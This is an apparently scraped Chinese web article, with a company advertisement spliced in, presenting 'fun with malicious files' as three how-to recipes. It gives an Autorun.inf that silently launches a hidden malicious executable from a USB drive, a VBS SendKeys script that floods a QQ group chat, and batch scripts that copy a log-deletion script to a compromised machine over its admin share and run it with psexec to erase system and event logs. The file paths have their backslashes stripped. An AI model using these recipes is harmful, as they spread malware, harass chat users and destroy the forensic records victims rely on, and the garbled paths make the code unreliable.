189 8069 5689

恶意文件小乐趣

1、将可执行恶意文件放入U盘。并设置隐藏。

创新互联是一家专注于网站设计制作、网站设计与策划设计,江油网站建设哪家好?创新互联做网站,专注于网站建设10年,网设计领域的专业建站公司;建站业务涵盖:江油等地区。江油做网站价格咨询:13518219792

2、创建文件 Autorun.inf

3、写入内容:

[AutoRun]
OPEN=恶意文件全名
shellexecute=恶意文件全名
shell\Atuo\command=恶意文件全名

隐藏本文件。

4、当U盘插入新的设备,操作人员双击U盘图标查看U盘时,会自动运行恶意文件。

VBS脚本,QQ群聊刷屏:

新建vbs后缀文件。内容如下:

Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "群聊刷屏测试"
for i=1 to 10 
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next

#for i=1to 10”语句用来控制发送次数,表示发送10次

打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。


日志清除:


新建del.bat脚本

@del c:winntsystem32logfiles*.* 
@del c:winntsystem32config*.evt 
@del c:winntsystem32dtclog*.* 
@del c:winntsystem32*.log 
@del c:winntsystem32*.txt 
@del c:winnt*.txt 
@del c:winnt*.log 
@del c:del.bat

新建clean.bat

@copy del.bat 
\%1c$ 
@echo 
向肉鸡复制本机的del.bat
……OK 
@psexec 
\%1 c:del.bat 
@echo 
在肉鸡上运行del.bat
,清除日志文件……OK

分享文章:恶意文件小乐趣
网站路径:http://cdxtjz.cn/article/pegdec.html

其他资讯